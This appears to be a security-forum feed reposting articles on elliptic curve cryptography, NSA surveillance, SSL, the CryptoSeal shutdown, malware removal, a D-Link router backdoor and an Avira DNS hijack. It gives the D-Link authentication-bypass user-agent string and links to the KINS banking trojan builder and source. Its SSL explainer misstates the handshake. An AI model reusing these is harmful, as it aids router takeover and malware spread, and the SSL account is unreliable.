point. It's like, in our bizarro billiards game, when a ball hits the edge of the board (the max) and then is magically transported to the opposite side of the table and continues on its path until reaching a point, kind of like the game Snake. With this new curve representation, you can take messages and represent them as points on the curve. You could imagine taking a message and setting it as the x coordinate and solving for y to get a point on the curve. It is slightly more complicated than this in practice, but that's the general idea. You get the points (70,6), (76,48), -, (82,6), (69,22) *There are no coordinates with 65 for the x value; this can be avoided in the real world. An elliptic curve cryptosystem can be defined by picking a prime number as a maximum, a curve equation, and a public point on the curve. A private key is a number priv, and a public key is the public point dotted with itself priv times. Computing the private key from the public key in this kind of cryptosystem is called the elliptic curve discrete logarithm function. This turns out to be the trapdoor function we were looking for. What does it all mean? The elliptic curve discrete logarithm is the hard problem underpinning ECC. Despite almost three decades of research, mathematicians still haven't found an algorithm to solve this problem that improves upon the naive approach. In other words, unlike with factoring, based on currently understood mathematics, there doesn't appear to be a shortcut that is narrowing the gap in a trapdoor function based on this problem. This means that for numbers of the same size, solving elliptic curve discrete logarithms is significantly harder than factoring. Since a more computationally intensive hard problem means a stronger cryptographic system, it follows that elliptic curve cryptosystems are harder to break than RSA and Diffie-Hellman. To visualize how much harder it is to break, Lenstra recently introduced the concept of "Global Security." You can compute how much energy is needed to break a cryptographic algorithm and compare that with how much water that energy could boil. This is a kind of a cryptographic carbon footprint. By this measure, breaking a 228-bit RSA key requires less energy than it takes to boil a teaspoon of water. Comparatively, breaking a 228-bit elliptic curve key requires enough energy to boil all the water on earth. For this level of security with RSA, you'd need a key with 2,380 bits. With ECC, you can use smaller keys to get the same levels of security. Small keys are important, especially in a world where more and more cryptography is done on less powerful devices like mobile phones. While multiplying two prime numbers together is easier than factoring the product into its component parts, when the prime numbers start to get very long, even just the multiplication step can take some time on a low powered device. While you could likely continue to keep RSA secure by increasing the key length, that comes with a cost of slower cryptographic performance on the client. ECC appears to offer a better tradeoff: high security with short, fast keys. Elliptic curves in action After a slow start, elliptic curve based algorithms are gaining popularity, and the pace of adoption is accelerating. ECC is now used in a wide variety of applications: the US government uses it to protect internal communications, the Tor project uses it to help assure anonymity, it is the mechanism used to prove ownership of bitcoins, it provides signatures in Apple's iMessage service, it is used to encrypt DNS information with DNSCurve, and it is the preferred method for authentication for secure Web browsing over SSL/TLS. A growing number of sites use ECC to provide perfect forward secrecy, which is essential for online privacy. First generation cryptographic algorithms like RSA and Diffie-Hellman are still the norm in most arenas, but ECC is quickly becoming the go-to solution for privacy and security online. If you are accessing an HTTPS version of the Cloudflare blog from a recent enough version of Chrome or Firefox, your browser is using ECC. You can check this yourself. In Chrome, you can click on the lock in the address bar and go to the connection tab to see which cryptographic algorithms were used in establishing the secure connection. Clicking on the lock in Chrome 30 should show the following image. The relevant portions of the text to this discussion involve ECDHE_RSA. ECDHE stands for Elliptic Curve Diffie Hellman Ephemeral, and it is a key exchange mechanism based on elliptic curves. This algorithm is used by websites to provide perfect forward secrecy in SSL. The RSA component means that RSA is used to prove the identity of the server. Sites that use RSA use it because their SSL certificate is bound to an RSA key pair. Modern browsers also support certificates based on elliptic curves. If a site's SSL certificate was an elliptic curve certificate, this part of the page would state ECDHE_ECDSA. The proof of the identity of the server would be done using ECDSA, the Elliptic Curve Digital Signature Algorithm. Here's a sample ECC curve for ECDHE (This is the same curve used by Google.com): max: 115792089210356248762697446949407573530086143415290314195533631308867097853951 curve: y^2 = x^3 + ax + b a = 115792089210356248762697446949407573530086143415290314195533631308867097853948 b = 41058363725152142129326129780047268409114441015993725554835256314039467401291 The performance improvement of ECDSA over RSA is dramatic. Even with an older version of OpenSSL that does not have assembly-optimized elliptic curve code, an ECDSA signature with a 256-bit key is over 20 times faster than an RSA signature with a 2,048-bit key. On a MacBook Pro with OpenSSL 0.9.8, the "speed" benchmark returns: Doing 256 bit sign ecdsa's for 10s: 42874 256 bit ECDSA signs in 9.99s Doing 2048 bit private rsa's for 10s: 1864 2048 bit private RSA's in 9.99s That's 23 times as many signatures using ECDSA as RSA. Using ECC saves time, power, and computational resources for both the server and the browser, helping us make the Web both faster and more secure. The downside It's not all roses in the world of elliptic curves. There have been some questions and uncertainties that have held them back from being fully embraced by everyone in the industry. One point that has been in the news recently is the Dual Elliptic Curve Deterministic Random Bit Generator (Dual_EC_DRBG). This is a random number generator standardized by the National Institute of Standards and Technology (NIST) and promoted by the NSA. Dual_EC_DRBG generates random-looking numbers using the mathematics of elliptic curves. The algorithm itself involves taking points on a curve and repeatedly performing an elliptic curve "dot" operation. After publication, it was reported that it could have been designed with a backdoor, meaning that the sequence of numbers returned could be fully predicted by someone with the right secret number. Recently, the company RSA recalled several of its products because this random number generator was set as the default PRNG for its line of security products. Whether or not this random number generator was written with a backdoor or not does not change the strength of the elliptic curve technology itself, but it does raise questions about the standardization process for elliptic curves. It's also part of the reason that attention should be spent ensuring that your system is using adequately random numbers. Some of the more skeptical cryptographers in the world now have a general distrust for NIST itself and the standards it has published that were supported by the NSA. Almost all of the widely implemented elliptic curves fall into this category. There are no known attacks on these special curves, chosen for their efficient arithmetic, but bad curves do exist and some feel it is better to be safe than sorry. There has been progress in developing curves with efficient arithmetic outside of NIST, including curve 25519 created by Daniel Bernstein (djb) and more recently computed curves by Paulo Baretto and collaborators. But widespread adoption of these curves is several years away. Until these non-traditional curves are implemented by browsers, they won't be able to be used for securing cryptographic transport on the Web. Another uncertainty about ECC is related to patents. There are over 130 patents that cover specific uses of elliptic curves owned by BlackBerry (through its 2009 acquisition of Certicom). Many of these patents were licensed for use by private organizations and even the NSA. This has given some developers pause over whether their implementations of ECC infringe upon this patent portfolio. In 2007, Certicom filed suit against Sony for some uses of elliptic curves, but that lawsuit was dismissed in 2009. There are now many implementations of ECC that are thought to not infringe upon these patents and are in wide use. The ECDSA digital signature has a drawback compared to RSA in that it requires a good source of entropy. Without proper randomness, the private key could be revealed. A flaw in the random number generator on Android allowed hackers to find the ECDSA private key used to protect the Bitcoin wallets of several people in early 2013. Sony's PlayStation implementation of ECDSA had a similar vulnerability. A good source of random numbers is needed on the machine making the signatures. Dual_EC_DRBG is not recommended. Looking ahead Even with the above cautions, the advantages of ECC over traditional RSA are widely accepted. Many experts are concerned that the mathematical algorithms behind RSA and Diffie-Hellman could be broken within as little as five years. With the clock ticking that fast, ECC may be left as the only reasonable alternative. Author Nick Sullivan worked for six years at Apple on many of its most important cryptography efforts before recently joining CloudFlare, where he is a systems engineer. He has a degree in mathematics from the University of Waterloo and a Masters in computer science with a concentration in cryptography from the University of Calgary. This post was originally written for the CloudFlare blog and has been lightly edited to appear on Ars. Readers are reminded that elliptic curve cryptography is a set of algorithms for encrypting and decrypting data and exchanging cryptographic keys. Dual_EC_DRBG, the cryptographic standard suspected of containing a backdoor engineered by the National Security Agency, is a function that uses elliptic curve mathematics to generate a series of random-looking numbers from a seed. This primer comes two months after internationally recognized cryptographers called on peers around the world to adopt ECC to avert a possible "cryptopocalypse." Sursa: A (relatively easy to understand) primer on elliptic curve cryptography | Ars Technica

October 25, 2013, 12:22 AM — The U.S. monitored the phone conversations of 35 world leaders, according to a National Security Agency document provided by its former contractor, Edward Snowden, according to The Guardian newspaper. The names of the world leaders is not disclosed in the document of 2006, and access to the 200 phone numbers of the leaders provided "little reportable intelligence," as the phones were apparently not used for sensitive discussions. The numbers, however, provided leads to other phone numbers that were subsequently targeted, according to the document. The document is likely to add to concerns about NSA surveillance, including its monitoring of phones of political leaders. German officials said this week that U.S. intelligence agencies may have spied on German Chancellor Angela Merkel's mobile phone. There have also been reports that the U.S. hacked into the email server of Mexico's former president Felipe Calderon while he was in office, and also spied on Brazil's President Dilma Rousseff. A report in French newspaper Le Monde alleged that the NSA recorded data relating to over 70 million phone calls involving French citizens over a period of 30 days. U.S. Director of National Intelligence, James R. Clapper said the allegation that the NSA had collected recordings of French citizens' telephone data was false. Alarmed at the developments, some countries are considering measures. Brazil has, for example, proposed in-country data storage requirements under an Internet bill before the country's Parliament. The phone numbers of leaders were handed over to the NSA as part of a policy encouraging people to provide the direct, residence, mobile phone and fax numbers of foreign political and military leaders. The note asking for "targetable" phone numbers was addressed to "customer" departments, which the Guardian said includes the White House and the Pentagon Sursa: NSA spied on 35 world leaders according to leaked document | ITworld Pe acelasi subiect: http://www.mediafax.ro/externe/nsa-ar-fi-interceptat-comunicatiile-telefonice-a-35-de-lideri-ai-planetei-11559356

Germany calls such surveillance 'completely unacceptable,' Merkel's spokesman says October 23, 2013, 3:15 PM — U.S. intelligence agencies may have spied on German Chancellor Angela Merkel's mobile phone, which would be a "grave breach of trust," the German government said late Wednesday. The German government has asked for "immediate and comprehensive" information on the possible surveillance, Merkel spokesman Steffen Seibert said in a statement posted on the German government's website. Seibert didn't disclose how the German government received information about the surveillance. Merkel, in a phone call with U.S. President Barack Obama, said such surveillance would be "completely unacceptable," the statement said. Merkel told Obama she expects U.S. authorities to detail the scope of monitoring practices in Germany, Seibert said. Obama assured Merkel that intelligence agencies, including the U.S. National Security Agency, are not monitoring Merkel's phone, according to news reports. The German allegations follow months of news reports on the National Security Agency's surveillance programs. This week, German news magazine Der Spiegel reported that the NSA hacked into an email server used by former Mexico President Felipe Calderon in 2010. Sursa: Germany says US may have spied on Merkel's mobile phone | ITworld Pe acelasi subiect: Federal Intelligence Service (BND), and the Federal Office for Information Security, Berlin seems to have found their suspicions plausible enough to confront the US government. - http://www.spiegel.de/international/world/merkel-calls-obama-over-suspicions-us-tapped-her-mobile-phone-a-929642.html http://rt.com/news/merkel-monitor-phone-us-634/

In this article, I am going to tell you everything about SSL: What it is, why we need it, its technical and non-technical aspects, etc. This article covers the introduction, SSL certificate, encryption, the process of encryption, and how your browser interacts with and trusts that certificate provided by the website you are visiting. Existence of SSL There are basically two aspects of SSL. One is encryption and the second is identification. Encryption is what you do to hide the content of the data sent from one machine to another machine. It is done by changing the content of the data so it looks like garbage that is human-readable but not human-understandable. It is exactly like speaking in a different language with which one person is not familiar. I am Indian; if someone speaks in the Russian language, it is not understandable by me, so to me the Russian language is like an encrypted language. However, if I get a translator and he/she translates that Russian language into Hindi then I can say that now it is understandable by me. So it is said that message has been decrypted. Identification is related to trust. In the previous scenario, how can I trust the translator who is converting Russian language to Hindi? Is she/he legitimate? Can I trust him/her? In the digital world, it is something like this. Your machine has to trust the SSL certificate (security mechanism) provided by the website via an SSL certificate issuing vendor. Encryption Explained To understand the scenario, let’s take an example directly. Let’s suppose you are sending credit card details to the company (any company/online purchasing website, etc.) So here is the scenario: You are on the left and you will be sending your card details to the other machine. Now there can be two scenarios: Without SSL With SSL Without SSL: In this scenario there can be another machine in your network that can grab the details sent by another machine, as shown in the figure below. As you know, this scenario is without SSL. In this case, any malicious user lying in the same network can perform an MITM attack or any other attack that contains simple network traffic monitoring and can grab your credit card number or any other personal details. So it is always necessary to use SSL to act as a barrier. It creates a tunneling technique. With SSL: SSL puts the security mechanism on the network layer before you transfer the data. As the picture below shows, it creates a barrier or tunnel through which the user can transfer any data to the other network. This time the malicious user (lying on the same network) will see the tunnel, so he won’t be able to grab your private data as it passes through the tunnel. As you can in the picture, a malicious user grabs the data passing through the tunnel, but she/he will get encrypted data, not the real plain text data. So the data can be grabbed but now it has only garbage value for the cracker/hacker, as she/he will never come to know that what exactly the real data was. In order to decrypt the data, the hacker will need an encryption key, which she/he will never get. Let’s see what HTTPS coding looks like. Here I will give you Twitter ‘s sign-in page source code. As you all know, every sign-in page uses the POST method to pass our data to the server. Every POST method is defined under the form. A form action method is shown in the picture below. You can see here that the action in the HTML code is embedded with HTTPS, which is a secure HTTP method. It confirms that your log-in credentials are secure once you click on the submit button in order to log in. The actual process of Encryption is enclosed below. The ‘Actual’ Process of Encryption Everything we are doing is a digital process that happens in no matter of time but, in reality, it’s really a long process that has many steps. At each step, integrity and authenticity are involved. As soon as you hit the button to log in, First it says that now your machine (computer) is ready for the encryption process. Second, the server will send one certificate to your machine, which has to be digitally signed by you. If you don’t go through the process of logging in, the server will not send your certificate as it’s not actually needed, because you are not going to give any credentials to the server. Third, your machine digitally signs the certificate in the backend and sends it to the server. Indirectly it tells the server that, “I am ready now, kindly start the encryption process, please.“ Fourth, the server receives the certificate signed by your machine and starts the encryption process at the client’s end. Last, the server actually encrypts all the messages passed by the client and, after successful encryption, all the data is passed through the secure tunnel at the server end. This whole process is called a “handshake.” The ‘Actual’ Process of Encryption Unleashed in Detail How does your machine choose an encryption process? What are the different possibilities/methods involved in this process? Encryption process basically includes three parts. Encrypting Message: There are many algorithms for encrypting messages. The most famous are AES, 3-DES, and RC4. People generally use one of these methods to encrypt the message. Each algorithm contains many operations, such as shiftrows, subbytes, mixcolumns, addroundkey etc.. That is the only strength of these algorithms. If the algorithm has more operations, it provides better encryption. It is the way of encrypting data between client and the server. Hashing—This is known as a message authentication code. This term is used in cryptography. It includes a hash function combined with a secret key and it is used for authentication as well as data integrity. The strength of the hashing depends on the cryptographic function used in that along with the key. Generally HMAC-MD5 and HMAC-SHA1 are used for the hashing. Choosing a Key for Encryption—It contains a key exchange mechanism such as RSA, DSA, or Diffie-Hellman algorithm. One can get more information on this part by searching “TLS and public key cryptography” on Wikipedia. Scenario: Let’s suppose the computer on the left side is about to send the “Hello World” message to the server and it chooses the AEC cipher method, HMAC-MD5 hashing technique, and RSA key. Along with all these three data, it also sends the version number of SSL used by your machine for TLS (transport layer security) and random number. A random number is nothing but the master calculation that is used to do all other calculation for the encryption process. All this information is passed to the server. In the next stage, the server sends a certificate to the client. This certificate contains information such as version number, serial number, signature, issuer, validity, subject, IssuerUniqueIdentifier, SubjectUniqueIdentifier, Signature algorithm, signature value, public key, etc. In phase 3, your computer tells the server to start encryption. Here both machines have to take part in the conversation. There are three steps to accomplish this process. 1. Key Exchange—Here both the machines calculate the master secret code that will be used for the encryption process. 2. Change Original Text—Your computer tells the server to change the original text written in order to send the server. In our case, it’s “Hello World.” So the server actually receives confirmation of starting an encryption process and it starts the encryption process in order to generate the cipher text for our given text. 3. Finish State—In the last stage of the process, your computer tells the server that all the messages have been encrypted now and ready to go. After all these three states occur, the message is sent to the server. In phase 4, the server receives the messages from the client side and it encrypts those messages to make it cipher text. Then the server tells the client that it has finished encrypting the message and a message is sent back to the client is in encrypted form. Both of these scenarios are shown together in the pic below. So this is the scenario of SSL. If we take the-real life scenario, then SSL works something like this: SSL Identification Another important thing has to be considered while using SSL. It is all about trust. You have to make sure that the website with which you are corresponding is the real website that you assume it is and that you trust. It doesn’t mean that, if you have an SSL certificate, then you are secure. Having an SSL certificate only is not enough, So that is why identification comes into play. It’s all about who you actually trust. You might have seen the pic below when you try to access a website on the Internet. It represents SSL. There is a whole big process involved behind this dialogue box. The process behind this is something like this: First the website that you are going to access through SSL has to go to an organization that provides certificate authority. That organization will look into the details of the company/website and it will verify that the information is true about that company. To get the certificate, the company has to give certain information about itself. That information may include: The web server name Company name Location of company Then the authority company checks whether this information is correct or incorrect. If it is correct, it goes to step 2. That company then creates one certificate and digitally signs it with cryptographic methods explained previously in this article. One certificate looks like this (there are different certificates): The certificate contains this information : Signature Signature algorithm Version Serial number Algorithm ID Issuer Identifier for issuer Identifier for company Public key Information Key Algorithm [*]Validity [*]Company details Now the signature is generated. A certificate contains all this information and the numbers used in this information are taken by the hashing algorithm, which does the calculations and generates signature. So the only number field that contains all this information is taken by the hashing algorithm in order to generate the signature. Then that number gets encrypted with the private key, so anyone who is holding a public key can verify that number. Then they send the certificate to the company that you are going to access. The certificate generated in step 2 is given back to the company that asked for that certificate. Let’s suppose it runs an IIS/APACHE/TOMCAT web server. It installs that certificate on the web server. One can configure any of these web servers to use that certificate. On the other hand, when you are trying to access the website, the certificate comes from the website at your end. Your browser will verify the details of the certificate and check that the information is true, then your browser will also sign that certificate. Make sure your browser won’t sign the incorrect certificate. At the client side, the certificate looks as shown below. This will be used in the handshake. When your browser gets certificate, it verifies it via the signature and then it encrypts the data. So I have simplified and unleashed SSL in front of you. Now I will give you a practical demonstration of how you can generate your own SSL certificate and how to use it. How to Generate SSL Certificate We will download and install the required package to install an SSL certificate. Then we will sign the certificate manually by giving a personal information to the certificate. After this has been completed, we will restart the HTTPD service in order to run our SSL certificate successfully. Step 1: Downloading and Installing Required Software To generate an SSL certificate, OpenSSL and mod_ssl must be installed on the system. This tool may have already been installed in Apache, however this varies from system to system. So we will install these tools by using the following command: # yum install mod_ssl openssl Step 2: Sign Our SSL Certificate Manually We will now use OpenSSL to sign our certificate. It is important to have this SSL certificate from a valid and trusted certificate providing authority if the use is for any company or organization. However, if it’s for personal use then one can do it at home and there will be no need for a trusted company to provide a signed certificate. We will have to follow the steps below to create a self-signed certificate: Create A Private Key CSR Generation Key Generation (Self-Signed) Put Files In Proper Location Now that we have configured our task and put files into the right folder, we will update the Apache server by updating the SSL configuration file, which is ssl.conf. We will use the nano editor to update our ssl.conf file and change the path of the key file, where we have stored our files, such as the certificate and key. The next step is to save and exit this file, after which we will start HTTPD service by typing the following command in the terminal: # /etc/init.d/httpd restart Now that we have set up our secure socket layer, if we attempt to log in to our the server machine through the client machine or attacking machine via the https protocol, it will ask for the authentication. Before the authentication, a dialogue box is shown that warns the “connection is not trusted” and asks if they want to see the certificate that is going to be downloaded to the machine or if they want to stay in offline mode. Once the user clicks on the view certificate, it will display the certificate that was created earlier. This screenshot below illustrates this step: It shows the issuer’s name, organization name, and validity of the certificate. With this secure connection, if one logs in into the website or network, it will encrypt the plain text data and an attacker won’t be able to capture it straight away with the Wireshark option. Experiment: I have set up the Apache server and I have performed an MITM attack in which I pass log-in credentials without SSL and with SSL. For both ways I captured Wireshark screenshots. Those screenshots are as follows: As you can see, one can capture your log-in credentials if you are not using SSL and not encrypting your data. The SSL handshake is being done now in the next picture; you will see the cipher text being generated and passing through the network. As you can see here, the credentials are encrypted now. No one can see the real credentials of the client passing through the network. Thus we see how SSL is useful to encrypt the data. Conclusion SSL can give protection against man-in-the-middle attacks. It can protect sensitive data such as log-in credentials, credit card details, home address, phone number, etc. References VMware Documentation Library Validation Certificate Info: The Advantages and Disadvantages of Using SSL SSL Certificates | Secure Your Data & Transactions - GoDaddy Transport Layer Security - Wikipedia, the free encyclopedia https://developer.mozilla.org/en-US/docs/NSS RFC 6101 - The Secure Sockets Layer (SSL) Protocol Version 3.0 SSL: Foundation for Web Security - The Internet Protocol Journal - Volume 1, No. 1 - Cisco Systems sursa: SSL Unleashed - InfoSec Institute

A consumer VPN service called CryptoSeal Privacy has shut down rather than risk government intrusions that could cost the company money in legal fees and threaten user privacy. CryptoSeal will continue offering its business-focused VPN, but the consumer service is done, the company announced: With immediate effect as of this notice, CryptoSeal Privacy, our consumer VPN service, is terminated. All cryptographic keys used in the operation of the service have been zerofilled, and while no logs were produced (by design) during operation of the service, all records created incidental to the operation of the service have been deleted to the best of our ability. Essentially, the service was created and operated under a certain understanding of current US law, and that understanding may not currently be valid. As we are a US company and comply fully with US law, but wish to protect the privacy of our users, it is impossible for us to continue offering the CryptoSeal Privacy consumer VPN product. VPN services let consumers gain extra privacy and security while using the Internet. A user establishes an encrypted connection with a VPN service, routing all Internet traffic to the VPN before sending it on to the rest of the Internet. Some VPN services promise only protection from common hackers, which is useful for people seeking extra security while surfing the Web on public Wi-Fi networks. To hide one's traffic from Internet service providers or governments, people look to VPNs that promise not to keep any logs that might reveal what they use the Internet for. CryptoSeal's description of its business VPN service says it's not designed to hide information from the government. "CryptoSeal Connect is not designed as a BitTorrent or other file-sharing VPN and is not designed to give you anonymity against the legal system," the company said. "We fully comply with all warrants and subpoenas and are located in the United States. We suggest using systems such as the Tor Project for anonymity requirements." The possibility of handing cryptographic keys over to the government is a troubling one, though. "For anyone operating a VPN, mail, or other communications provider in the US, we believe it would be prudent to evaluate whether a pen register order could be used to compel you to divulge SSL keys protecting message contents, and if so, to take appropriate action," CryptoSeal wrote. Lavabit case raises troubling legal possibilities The company referred to the case of Lavabit, an e-mail service that shut down rather than comply with government orders to monitor user communications. A legal filing in that case raises a possibility that is troubling for CryptoSeal. Specifically, it describes "a Government theory that if a pen register order is made on a provider, and the provider's systems do not readily facilitate full monitoring of pen register information and delivery to the Government in realtime, the Government can compel production of cryptographic keys via a warrant to support a government-provided pen trap device," CryptoSeal wrote. "Our system does not support recording any of the information commonly requested in a pen register order, and it would be technically infeasible for us to add this in a prompt manner," CryptoSeal continued. "The consequence, being forced to turn over cryptographic keys to our entire system on the strength of a pen register order, is unreasonable in our opinion and likely unconstitutional. But until this matter is settled, we are unable to proceed with our service." CryptoSeal is investigating "alternative technical ways" to comply with US law without sacrificing user privacy, but in the meantime it is offering customers refunds as well as "one year subscriptions to a non-US VPN service of mutual selection" and "free service for one year if/when we relaunch a consumer privacy VPN service." CryptoSeal also encouraged people to donate to a Lavabit legal fund. We've contacted CryptoSeal to ask why it's able to keep its business service open but haven't heard back yet. Selling to enterprises is more lucrative than selling to consumers, of course, providing one possible reason CryptoSeal chose this route. Another factor is that businesses seeking a VPN service may be more concerned about security from hackers than about hiding Internet activity from governments and Internet service providers. A comment on Hacker News apparently posted by CryptoSeal founder and CEO Ryan Lackey points to the cost of legal services being one of the main factors. "The financial issue was the potentially huge liability due to a legal action or battle, not the (small) costs of operating the service," Hacker News user "RDL" wrote. The service "was covering operating costs and some profit," but the risk of defending against a government order would have wiped that out. "If we were the legally best VPN option, I would probably have pushed to keep it going anyway and just shut down when/if that happened, but as it is, non-US providers run by non-US people (there are several good ones) are an objectively better option, so in good conscience there's no reason to continue running a US privacy VPN service without technical controls to prevent being compelled to screw over a user," RDL wrote. Sursa: CryptoSeal VPN shuts down rather than risk NSA demands for crypto keys | Ars Technica

Agen?ia american? de contraspionaj NSA a interceptat masiv comunica?iile telefonice ale cet??enilor francezi, dezv?luie, luni, cotidianul Le Monde, citând documente ale fostului consultant al agen?iei Edward Snowden. Într-o perioad? de 30 de zile, între 10 decembrie 2012 ?i 8 ianuarie 2013, NSA a efectuat 70,3 milioane de înregistr?ri de date telefonice ale francezilor, precizeaz? site-ul Lemonde.fr. Aceste informa?ii, dezv?luite în iunie de fostul consultant al agen?iei, Edward Snowden, descriu tehnicile folosite pentru captarea ilegal? a secretelor sau a vie?ii private a francezilor, adaug? cotidianul. NSA dispune de mai multe moduri de colectare, afirm? Le Monde. Când unele numere de telefon sunt folosite în Fran?a, ele activeaz? un semnal care declan?eaz? automat înregistrarea unor conversa?ii. Aceast? supraveghere recupereaz?, de asemenea, mesaje telefonice ?i con?inutul lor în func?ie de cuvinte cheie. În mod sistematic, NSA p?streaz? istoricul conversa?iilor fiec?rei ?inte, precizeaz? cotidianul. Acest spionaj apare în cadrul programului cu numele de "US-985D". Potrivit Le Monde, explica?ia exact? a acestei sigle nu a fost furnizat? pân? în prezent de documentele lui Snowden sau de fo?ti membri ai NSA. Ca o compara?ie, siglele folosite de NSA pentru acela?i tip de interceptare în Germania sunt "US-987LA" ?i "US-987LB", constat? cotidianul. Aceast? serie de cifre ar corespunde cercului calificat de Statele Unite drept "a treia parte" c?reia i-ar apar?ine Fran?a, Germania dar ?i Austria, Polonia sau Belgia. "A doua parte" se refer? la ??rile anglo-saxone apropiate de Washington, precum Marea Britanie, Canada, Australia ?i Noua Zeeland?, cunoscute sub numele de "Five Eyes". "Prima parte" este format? din 16 servicii secrete americane. Documentele ofer? suficiente explica?ii pentru a considera c? ?intele NSA sunt atât persoane suspectate de leg?turi cu activit??ile teroriste, cât ?i persoane vizate pentru simpla lor apartenen?? la lumea de afaceri, politic? sau la administra?ia francez?. Graficul NSA arat? o medie a intercept?rilor de trei milioane de date pe zi cu cre?teri la aproape ?apte milioane din 24 decembrie 2012 pân? în 7 ianuarie 2013, precizeaz? cotidianul. În plus, potrivit documentelor NSA ob?inute de Le Monde, agen?ia american? s-a interesat îndeaproape, între 1 ?i 31 ianuarie 2013, de adresele de mesagerie wanadoo.fr, fosta filial? Orange, care num?r? înc? 4,5 milioane de utilizatori, ?i alcatel.lucent.com, companie franco-american? de telecomunica?ii. Ministrul francez de Interne, Manuel Valls, a calificat aceste informa?ii drept "?ocante" ?i a anun?at c? se vor cere explica?ii Statelor Unite. Sursa: NSA a interceptat milioane de comunica?ii telefonice în Fran?a - Mediafax

Utilitare necesare: Process explorer: Process Explorer Dll unloader: NoVirusThanks DLL UnInjector: unload DLLs within a selected process Autoruns: Autoruns for Windows Sample: (obtinut via https://rstforums.com/forum/76543-intrebare.rst#post492576 ) Program de dat flood ip adress.exe MD5: 5acd5a6130b43c94ddb3418959f4c39c ~110K process: C:\WINDOWS\mstwain32.exe dropped files: c:\WINDOWS\mstwain32.exe ~110K MD5: 5acd5a6130b43c94ddb3418959f4c39c c:\WINDOWS\cmsetac.dll ~33K MD5: 034e1f7e1d643572dc843ab535f6d60e c:\WINDOWS\ntdtcstp.dll ~7K MD5: 67587e25a971a141628d7f07bd40ffa0 persistence: initial nu apare listat in autoruns sau regedit HKCU\Software\Microsoft\Windows\CurrentVersion\Run mstwain32 C:\WINDOWS\mstwain32.exe Eliminare: pasul 1 process explorer> suspend mstwain32.exe pasul 2 rename mstwain32.exe to mstwain32.ex pasul 3 unload and delete dlls c:\WINDOWS\ntdtcstp.dll c:\WINDOWS\cmsetac.dll pasul 4 process explorer> kill mstwain32.exe pasul 5 delete mstwain32.ex pasul 6 remove persistence> autoruns HKCU\Software\Microsoft\Windows\CurrentVersion\Run mstwain32 File not found: C:\WINDOWS\mstwain32.exe

In curand, mai precis din 11 noiembrie a.c., utilizatorii serviciilor Google isi vor putea vedea numele sau fotografia de profil, sau comentariile in reclame online. Compania si-a actualizat termenii si conditiile de utilizare permitandu-le sa adauge numele utilizatorilor, fotografiile acestora si comentariile intr-o serie de reclame numite Shared Endorsements. Acestea vor apare in cadrul serviciilor Google incluzand Google Play, Maps si Search. De exemplu, daca ai evaluat un album sau cantec pe Google Play, prietenii tai vor vedea aceasta activitate intr-o reclama; orice +1 dat companiilor poate fi inclus in reclamele din Google Search. Demersul Google este similar celui facut în luna august de reteaua de socializare Facebook. Utilizatorii pot opta sa nu permita acest lucru dand click AICI. Sursa: Google va folosi numele si fotografiile utilizatorilor in scopuri comerciale engleza: http://www.usatoday.com/story/tech/2013/10/11/google-terms-web-ads/2965507/

The backdoor could be used to modify a router's settings, a dangerous vulnerability A backdoor found in firmware used in several D-Link routers could allow an attacker to change a device's settings, a serious security problem that could be used for surveillance. Craig Heffner, a vulnerability researcher with Tactical Network Solutions who specializes in wireless and embedded systems, found the vulnerability. Heffner wrote on his blog that the web interface for some D-Link routers could be accessed if a browser's user agent string is set to "xmlset_roodkcableoj28840ybtide." Curiously, if the second half of the user agent string is reversed and the number is removed, it reads "edit by joel backdoor," suggesting it was intentionally placed there. "My guess is that the developers realized that some programs/services needed to be able to change the device's settings automatically," Heffner wrote. "Realizing that the web server already had all the code to change these settings, they decided to just send requests to the web server whenever they needed to change something. "The only problem was that the web server required a username and password, which the end user could change. Then, in a eureka moment, Joel jumped up and said, 'Don't worry, for I have a cunning plan'!" The technology industry has been rattled by documents leaked by former NSA contractor Edward Snowden, which indicate the spy agency pursues ways to subvert security measures through backdoors. But developers sometimes make mistakes and in other cases, make poor security decisions. With access to a router's settings, an attacker could potentially steer someone's Internet traffic through another their own server and read their unencrypted data traffic. To find other vulnerable D-Link router models, Heffner used a special search engine called Shodan, which is designed to find any device connected to the Internet, ranging from refrigerators to CCTV cameras to routers. The affected models likely include D-Link's DIR-100, DI-524, DI-524UP, DI-604S, DI-604UP, DI-604+, TM-G5240 and possibly the DIR-615. The same firmware is also used in the BRL-04UR and BRL-04CW routers made by Planex, Heffner wrote. A web search turned up the suspicious user agent string in a post on a Russian forum three years ago, Heffner wrote, which means somebody has known about it for a while. D-Link officials could be immediately reached for comment on Monday. Sursa: Backdoor found in D-Link router firmware code | ITworld how to: https://rstforums.com/forum/76403-reverse-engineering-d-link-backdoor.rst

KINS Builder/Source Download: Download KINS 1.0.2.0.zip from Sendspace.com - send big files the easy way with panel fixed from RU to EN: Download KINS.rar from Sendspace.com - send big files the easy way Password : trojanforge.com sursa: http://trojanforge.com/showthread.php?t=6572 About KINS: XyliBox: Having a look on the KINS Toolkit 'Next Big' Banking Trojan Spotted In Cybercrime Underground -- Dark * nu stiu cat de "curate" sunt fisierele din arhiva

It appears that several websites of Avira as well as other companies have been compromised by a group called KDMS. The websites of Avira have not been hacked, the attack happened at our Internet Service Provider “Network Solutions”. What happened? The DNS records of various websites, including those of Avira.com, were changed to point to other domains that do not belong to Avira. It appears that our account used to manage the DNS records registered at Network Solutions has received a fake password-reset request which was honored by the provider. Using the new credentials the cybercriminals have been able to change the entries to point to their DNS servers. Our internal network has not has not been compromised in any way. As a measure of security we have shut down all exterior services until we have all DNS entries in our possession again. Our products were not affected at any point, including the update servers for product and detection updates. These servers are not registered at Network Solutions. We can assure all our partners and customers that no data of any kind (customer data, source code, etc.) has been stolen during this incident. No malicious code was delivered to the visitors of the website either by direct download or by drive-by downloads. What are the next steps? We are working with the ISP to receive control on the domain name and only when we have solved the problem we will restore the access to the Avira services. At this point we are not aware of any effect to our customers. Sursa: Major DNS hijacking affecting major websites, including avira.com | Avira – TechBlog

